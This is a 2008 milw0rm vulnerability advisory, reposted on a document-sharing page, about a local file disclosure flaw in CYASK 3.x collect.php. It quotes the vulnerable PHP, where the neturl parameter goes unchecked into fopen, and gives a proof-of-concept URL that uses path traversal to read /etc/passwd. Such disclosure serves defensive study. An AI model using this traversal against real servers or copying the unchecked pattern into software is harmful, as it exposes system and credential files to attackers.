Do you have something the world needs to know about? Post your favorite news files in PDF, campaign contributions information from Excel, or handouts from your local politicians.

Global Documents

1 This vulnerability leads to that the attacker can read any file on your webserver when it installs cyask.
2
3 The $neturl variable in collect.php is short of enough check. When the attacker registers a new user, he can pass 
4 the user check and then submit any filename to $neturl so that collect.php can read it.
5
6 The vuln code like this:
7 $url=get_referer();
8     $neturl=empty($_POST[’neturl’]) ? trim($_GET[’neturl’]) : trim($_POST[’neturl’]);
9   
10     $collect_url=empty($neturl) ? $url : $neturl;
11   
12     $contents = ’’;
13     if($fid=@fopen($collect_url,"r"))
14     {
15         do
16         {
17             $data = fread($fid, 4096);
18             if (strlen($data) == 0)
19             {
20                 break;
21             }
22             $contents .= $data;
23         }
24         while(true);
25         fclose($fid);
26     }
27
28 POC:
29 http://XXX.com/collect.php?neturl=../../../etc/passwd
30
31 # milw0rm.com [2008−09−18]
Page 1/1
CYASK 3.x collect.php neturl Local File Disclosure Vulnerability
xy7
09/18/2008
